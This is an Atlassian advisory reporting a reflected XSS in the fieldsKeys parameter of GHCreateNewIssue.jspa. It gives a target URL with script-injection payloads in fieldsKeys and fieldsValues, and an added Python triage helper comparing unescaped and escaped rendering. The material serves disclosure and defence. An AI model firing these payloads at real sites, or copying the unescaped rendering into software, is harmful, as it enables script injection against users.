XSS (reflected) in fieldsKeys parameter of GHCreateNewIssue.jspa

2012-08-03T03:24:43
ID ATLASSIAN:JSW-5575
Type atlassian
Reporter dblack
Modified 2017-02-20T00:44:58

Description

Targets: https://test01.jira-dev.com/secure/GHCreateNewIssue.jspa?key=&issueType=7&fieldsKeys=priority,customfield_10006,summary,fixVersions,components,customfield_10005,assignee,customfield_10004,reporter,customfield_100039fd29<script>alert('XSS')</script>15d31825f8e9d6606&fieldsValues=1@%@ @%@XSS"><script>alert('XSS')</script>@%@-1@%@-1@%@1000@%@0@%@100@%@isecpartners@%@iSEC"><script>alert('XSS')</script>&forcedFieldsKeys=&forcedFieldsValues=&createNext=false&projectId=&decorator=none&selectedProjectId=10000&pageType=ChartBoard&subType=ArchiveChartBoard&type=ACB&selectedBoardId=-1&colPage=1

Reproduction: After logging in, open the target URL in a browser. Supply the attack value "><script>alert('XSS')</script> in the fieldsKeys parameter.
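The following is an added triage example, not code from the advisory, the reporter or Atlassian. It parses the target URL above, lists the query parameters (and the individual comma-separated fieldsKeys entries) that carry HTML-active characters, and contrasts echoing such a value into an HTML attribute unescaped with echoing it HTML-escaped. Attribute-context escaping is the generic hardening for a reflected XSS and is assumed here; the advisory does not state what Atlassian's actual fix was, and the `<input type="hidden">` markup used to model the reflection is an assumption, not the real page output.

```python
"""Triage helper for the reflected XSS in GHCreateNewIssue.jspa.

Added example, not the advisory's or Atlassian's code. The hardened
rendering below (HTML escaping in attribute context) is the generic fix
for this bug class and is assumed, not taken from the vendor.
"""
import html
from urllib.parse import parse_qsl, urlsplit

# Target URL exactly as given in the advisory's "Targets:" line.
TARGET_URL = (
    "https://test01.jira-dev.com/secure/GHCreateNewIssue.jspa?key=&issueType=7"
    "&fieldsKeys=priority,customfield_10006,summary,fixVersions,components,"
    "customfield_10005,assignee,customfield_10004,reporter,"
    "customfield_100039fd29<script>alert('XSS')</script>15d31825f8e9d6606"
    "&fieldsValues=1@%@ @%@XSS\"><script>alert('XSS')</script>@%@-1@%@-1@%@1000"
    "@%@0@%@100@%@isecpartners@%@iSEC\"><script>alert('XSS')</script>"
    "&forcedFieldsKeys=&forcedFieldsValues=&createNext=false&projectId="
    "&decorator=none&selectedProjectId=10000&pageType=ChartBoard"
    "&subType=ArchiveChartBoard&type=ACB&selectedBoardId=-1&colPage=1"
)

# The attack value quoted in the advisory's reproduction step.
ATTACK_VALUE = "\"><script>alert('XSS')</script>"

# Characters that let a reflected value break out of an attribute or text node.
HTML_ACTIVE = ("<", ">", '"', "'")


def query_params(url: str) -> dict:
    """Return the query string as an ordered name -> value mapping.

    keep_blank_values=True keeps empty parameters such as key= and projectId=.
    """
    return dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))


def reflected_xss_params(url: str) -> list:
    """Names of query parameters whose values contain HTML-active characters."""
    return [name for name, value in query_params(url).items()
            if any(ch in value for ch in HTML_ACTIVE)]


def tainted_field_keys(url: str) -> list:
    """fieldsKeys is a comma-separated list of field ids; return the tainted ones."""
    keys = query_params(url).get("fieldsKeys", "").split(",")
    return [k for k in keys if any(ch in k for ch in HTML_ACTIVE)]


def render_unescaped(value: str) -> str:
    """Model of the vulnerable behaviour (assumed markup): the value is echoed
    into a double-quoted attribute as-is, so '">' closes attribute and tag and
    the following <script> becomes real markup."""
    return '<input type="hidden" name="fieldsKeys" value="' + value + '">'


def render_escaped(value: str) -> str:
    """Hardened rendering (assumed fix): html.escape with quote=True turns
    <, >, " and ' into entities, so the value stays inside the attribute."""
    return ('<input type="hidden" name="fieldsKeys" value="'
            + html.escape(value, quote=True) + '">')


def introduces_script_tag(rendered_html: str) -> bool:
    """True if a literal <script ...> tag ended up in the rendered markup."""
    return "<script" in rendered_html.lower()


if __name__ == "__main__":
    print("tainted parameters:", reflected_xss_params(TARGET_URL))
    print("tainted fieldsKeys entries:", tainted_field_keys(TARGET_URL))
    print("unescaped:", render_unescaped(ATTACK_VALUE))
    print("escaped:  ", render_escaped(ATTACK_VALUE))
```

Note that the target URL also carries the payload in fieldsValues, so a check that only looks at fieldsKeys would miss a second reflection point; the parameter scan above flags both.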